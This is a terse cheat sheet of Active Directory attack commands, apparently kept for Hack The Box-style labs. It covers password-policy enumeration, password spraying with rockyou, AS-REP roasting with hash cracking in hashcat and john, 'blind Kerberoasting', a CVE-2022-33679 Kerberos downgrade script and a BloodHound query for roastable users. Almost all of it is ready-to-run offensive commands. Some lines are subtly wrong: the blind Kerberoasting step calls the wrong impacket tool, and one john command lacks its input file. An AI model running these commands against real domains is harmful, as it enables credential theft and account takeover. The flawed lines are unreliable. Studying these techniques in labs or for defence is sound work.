Username - no password

1. Password policy

enum4linux-ng -P $ip

enum4linux-ng -u 'user' -p 'password' -P $ip

nxc smb $ip -u 'username' -p 'password' --pass-pol

---

1. Password spraying

nxc smb $ip -u users.txt -p users.txt --no-bruteforce --continue-on-success

nxc smb $ip -u users.txt -p /usr/share/wordlists/rockyou.txt --no-bruteforce --continue-on-success

---

1. AS-REP Roasting

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $ip 'htb.local/'

sudo hashcat -m 18200 ASREProastables.txt -r /usr/share/hashcat/rules/best64.rule --force

john --wordlist=/usr/share/wordlists/rockyou.txt ASREProastables.txt

---

1. Blind Kerberoasting

impacket-GetNPUsers -no-preauth "username" -usersfile "users.txt" -dc-host $ip "domain.local"/

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt

---

1. CVE 2022-33679 - Windows Kerberos Elevation of Privilege

The attack targets Windows domain accounts that have pre-authentication disabled and it attempts an encryption downgrade attack.

CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4

CVE-2022-33679.py domain.local/username $ip

---

1. List users with pre-auth disabled (ASREPRoastable) CREDS NEEDED

#bloodhound
MATCH (u:User) WHERE u.dontreqpreauth = true AND u.enabled = true RETURN u